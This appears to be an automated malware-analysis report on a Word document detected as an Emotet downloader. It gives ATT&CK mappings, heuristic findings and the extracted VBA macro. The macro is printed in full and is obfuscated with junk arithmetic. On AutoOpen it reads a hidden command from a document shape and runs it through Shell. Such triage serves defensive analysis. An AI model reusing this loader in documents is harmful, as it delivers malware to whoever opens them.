MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1059.003 Windows Command Shell
The sample contains a VBA macro with an autoopen subroutine that invokes cmd.exe with a complex command. This command appears to be designed to download and execute a second-stage payload, as indicated by the presence of PowerShell references and the ClamAV detection for Emotet. The use of cmd.exe and PowerShell points to command execution, and the autoopen macro suggests a malicious document lure.
Heuristics 10
-
ClamAV: Doc.Downloader.Emotet-6780510-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6780510-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
_ .Shell(fiuOmuVi, qHVGfkUWS), wYfdZPpjf) HFRToOqFALDwlwTF = (224706231 + Round(ajjsnlQBFUFBoRFoXRWPnLi) * 324377194 - SpDfRwlXqzziOR + (CmJWAwWltwZBiSEPCmpU / Tan(NWnXTdzRHKIzqMBBIzEwDKjs))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() lFhWQUo -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4847 bytes |
SHA-256: 642af68338dd3b85054af97c2bf126db9d3172d404fa4ee5168d950fae71f323 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
142 of 173 identifiers look randomly generated (e.g. 'NWnXTdzRHKIzqMBBIzEwDKjs') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OrRhjCEQYBWHER" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() lFhWQUo End Sub Attribute VB_Name = "WuXAvEX" Function lFhWQUo() On Error Resume Next hTILiiEasCazojiHiBAzR = (265717628 + Round(sVmaBFmccElDdNJ) * 279658780 - mNSlYihCtNlziEPsM + (qvDCVFazuCjAuYKlM / Tan(WWUmFYHsBiuzVK))) wTvLksMLaoiWsSMnz = 292065055 WdrUBmCpEHqLwVj = (226359617 + Round(jaJvmAsXGsOGzWlEplH) * 84533675 - OuzFQNFirUfwVmNSKjdzwv + (ojFkEHJkbVoSjJpWnmpPXjJ / Tan(jYmiBdNpTALWLcAbhkDb))) UjJVNqMHfVFabAjUiiwH = 339112785 IbbrcwiDuUzhLSrGZjLwiY = (103593892 + Round(GwGChBqaiaFEsUOlpY) * 188876587 - rUwBWjomDYFjLG + (fscWtiXDlNnNEVaIJvOcl / Tan(FfBNDXFVVsljjt))) CjXURLnjSjRcPvoz = 198988965 GRLBrXaiQHilaOQu = (283288209 + Round(HlHZopvjEGqfPjHuM) * 100974446 - wTiczKlTzzdNrzY + (JDhdWGLTTrlszdfBA / Tan(swdIKOCVzjatzhqSzrflm))) IKJFZtWUUbMGFalBsSaBIis = 174499907 RCiStuzblwjpJDNONAQr = (129642150 + Round(IpfuikVjOuKjuiGLY) * 267006074 - uGsFrvuvrWRlwJAu + (mwLOGEkoiZJfIBbcdZKQjo / Tan(opdKwIOatnRYadzoCHQNVkQj))) qJSjpiFwzWYctojPzP = 285516615 rToNpUfEVbhidvtEhOsZ = (233346116 + Round(nIqMFazZFSmTsFBi) * 237568522 - RhoJzEoWmQQNzKz + (jfWdOFFvWOrJCnDCimHB / Tan(dJmXjoiIrVbWMZVIGr))) ctnkMfTwNOjLCvIC = 144366113 TwErSZVOhwvMrfbiCHWHjEm = (179487441 + Round(foDwCJjoiQSqBfZ) * 57100964 - llpHorhNFqiKLOLdlmlRPfn + (XNOInBbzzlSBlwrw / Tan(lwTAiSBGNPsnrfGwij))) cYaDOlKZwKrnupvdiTK = 296641512 CFOdfDPDGmXhJwpJumwB = (305713998 + Round(EdBGEhTZrKavzLqCJL) * 298580586 - QHaSzWSNddCLljAl + (ZzhkhvMHNAiTrclHiFz / Tan(jGiPFwNHOKQKFb))) MLcjLNLlVoulBREDbDirT = 111240274 zSpOvZBHGDKkLLEnYn = (155630660 + Round(DaKbZnQZVolCTcwjjQXRf) * 57483490 - zHuPrPwizBuRXHOoH + (blRSHRiNUDIPFEu / Tan(NTfYZKYGoAZLbbVb))) JDWwizdhiusZhvpWM = 301663205 BKshzowBKbIsnBjiXBHiXKH = (103515116 + Round(VOOXiaPjCOVoZFvqN) * 153372170 - JonkdJdribVqCcOiakdcAsLk + (LpzwMsJnIGihdlOFjkFhYT / Tan(KbUFkuwQcDwRTfuS))) LCuWkwzzPXRIGCNsinUrm = 167047239 Const qHVGfkUWS = 0 SpULqCFMdwhDvPftzoHm = (167557558 + Round(ojpCjWzuoaARzsKanBs) * 155512407 - QzGdpHZthhKGsAkWoTiNiH + (DiQmjXBGuBmXkiY / Tan(OZBHtqLHrZDziJJFJtDzYVq))) jaQEFdAnPYTojAMMTJ = 306855654 zLOQbAsWkrNmriWY = (233440611 + Round(TWihcAlEqZzsRE) * 164268138 - CLluTFOlHFirtzzm + (GDIiPiNfWKTZrZJNhfLmo / Tan(NHwaXWuLtbKLLAQfmdYP))) vvMQfVdLRmAsZpAhpLqkLRrO = 208735694 Set BYkrhO = OrRhjCEQYBWHER.Shapes(qVYIj + "tESslznR" + jPajCfCfM) CROTWlMjYfSIrAAUt = (52119434 + Round(trQqCpZDHAjjZiYkCawLPiD) * 174218891 - clpjAOGjvHYlbMiwhFjr + (saTQwtzwfPopLZDjUHmazdbz / Tan(aOSOhYTifjLVTBUJkPrkvPma))) MzwRzPwURXiihzqU = 48015641 nDTHuwzNnlpPJAUwwHEXf = (189752455 + Round(SdjVwYJdHkXWkYwYFdhdJEO) * 276182242 - luIIKACKLBdNbCpiH + (fldkawjzuwzjOPqFKiAVw / Tan(ULZWVKdbswBVjDlBTKZLG))) LcnOWVrKimluRSL = 23292253 jcPwqBVfMzdbmNwhwOdjJB = (61755534 + Round(tQvTwvmRorVomTwjaCnLO) * 20398826 - WDiHAiVdfTfDZGBiR + (MmusHvfQwGGOzVpB / Tan(QOnmiTOpVGPYaYUVwCQ))) iwmcklOWRVJOYjlUib = 193209678 ZjOmdmsPscwnAcudsT = (67697133 + Round(zJiZJzdFMIHUHYzshCzX) * 29499270 - zmjwYtwKzSHNTPwpciImCjUb + (bfBvpVnaCJvpNbkJBJpN / Tan(EiusZTORuQRIQwOuPJwUmRF))) APCYdAaiOkWwGD = 103922595 fiuOmuVi = BYkrhO.TextFrame.TextRange + PmzssI + Htdhw + srKRpou + ujZRnLt + dJMYTTYC + FkiUN + amVcjU + mQEEbbFz + PAZDqzZ + dQTYrtn + KMJwIijC + mmUoXwFD YvJuaRGFmtdMGdNYPrTS = (32776378 + Round(ntazUzDkrLNcMzTRw) * 9806046 - JdbOFkcdLvLhUYGI + (UdzICBBSzdQQEzsSH / Tan(oMiUNsUrpfdsEGpCzVDCHbZ))) GGLMGzSPNdSwmzQFnKMWoGZK = 179591521 UFtYrQHmmXAvtjquijAVij = (330654234 + Round(NzZXAFFJiAjbjSlwpYLL) * 153120000 - cPaPiBZuKlHPKsrklhRqQtCP + (PuCjFYmGRXJwlWDj / Tan(qvURHtGEndtjfjMLBSHXN))) MUItVhnzLOGfCH = 312604482 fZUIabwWilBRQrqzjYO = (173221070 + Round(WftSMYkijKNvZiXuuhYh) * 201443851 - TwdlPzIZjWjtJu + (qODNnwaoWqISCprqsBT / Tan(zobIlaJiqMfZdTDT))) TqEtIHuGjFkpfqspid = 13586502 HRuIRXvntcWKfcNAm = (52658082 + Round(WfspklARYaHroPYKNfrPhTR) * 111390502 - FaGpNiUYsjjPbKWRGXNm + (hvGSAVvsKCObLiLtcKsnS / Tan(iovlUUwawDitXfzWNMYjhdVn))) fLXiNVwSlMSXOAbuj = 41648165 SGftFzfPm = Array(FTHVoJ, wiijbmS, zwLzlwXK, Interaction _ _ _ _ _ _ _ _ .Shell(fiuOmuVi, qHVGfkUWS), wYfdZPpjf) HFRToOqFALDwlwTF = (224706231 + Round(ajjsnlQBFUFBoRFoXRWPnLi) * 324377194 - SpDfRwlXqzziOR + (CmJWAwWltwZBiSEPCmpU / Tan(NWnXTdzRHKIzqMBBIzEwDKjs))) DFlkusZzkpQVwjVZUllQCsG = 23349787 ZHERRTRWRiFaowWvoXQEj = (125718479 + Round(DDdWtTmkFhbrPLLfECVjRKk) * 304362306 - iEquuwwGMBOowXDiuAsNH + (kcrLBOmdsSilKPv / Tan(KldkDJzrHiSBWKrjibTOCj))) jTiIvFLMojEqHkWDbfzEXvl = 44604557 End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.